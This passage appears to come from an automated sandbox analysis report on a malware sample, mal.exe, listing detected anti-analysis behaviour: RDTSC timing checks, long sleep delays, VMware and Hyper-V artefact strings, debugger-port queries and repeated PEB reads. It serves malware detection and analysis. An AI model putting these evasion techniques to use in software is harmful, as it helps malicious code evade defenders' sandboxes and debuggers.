          Source: C:\Users\user\Desktop\mal.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\mal.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000030198E4 second address: 00000000030198EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 0000000003019B5E second address: 0000000003019B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\mal.exeCode function: 2_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\mal.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\mal.exe TID: 6020Thread sleep time: -54846s >= -30000s
          Source: C:\Users\user\Desktop\mal.exe TID: 412Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 4840Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 1320Thread sleep time: -35000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\mal.exeThread delayed: delay time: 54846
          Source: C:\Users\user\Desktop\mal.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000003.00000000.274123090.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.274123090.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000003.00000000.254840052.0000000001398000.00000004.00000020.sdmpBinary or memory string: War&Prod_VMware_SATAR
          Source: explorer.exe, 00000003.00000000.271180653.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.273881536.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.292643668.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000003.00000000.274123090.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000003.00000000.274123090.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.274403765.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000003.00000000.264498703.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000003.00000000.271180653.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.271180653.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.271180653.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\mal.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\mal.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\mal.exeCode function: 2_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\mal.exeCode function: 2_2_0040ACD0 LdrLoadDll,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045AA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0460C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0460C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0459746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0464740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0464740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0464740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045ABC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_046314FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04648CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0458849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04597D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04623D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0459C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0459C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04648D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0463E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0457AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045FA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0463FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0463FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0463FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0463FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04628DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0458D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0458D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_046405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_046405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04572D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04572D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04572D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04572D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04572D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04587E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04587E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04587E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04587E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04587E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04587E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0463AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0463AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0459AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0459AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0459AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0459AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0459AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0458766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0457C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0457C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0457C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0462FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04631608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0457E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0462FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04648ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045876E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04640EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04640EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04640EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0460FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04648F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0458EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0458FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0459F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045AA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045AA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0464070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0464070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045AE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0460FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0460FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04574F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04574F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04588794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04590050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04590050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04632073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04641074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04644015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04644015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0458B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0458B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0458B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0458B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0460B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0460B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0460B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0460B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0460B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0460B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045758EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04579080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045AF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0459B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0459B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0457B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0457B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0457C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04579100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04579100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04579100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04594120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04594120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04594120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04594120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04594120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_046041E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0457B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0457B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0457B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_046349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_046349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_046349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_046349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0459C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045AA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0462B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0462B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04648A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04579240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04579240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04579240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04579240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0463EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04604257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0457AA16 mov eax, dword ptr fs:[00000030h]
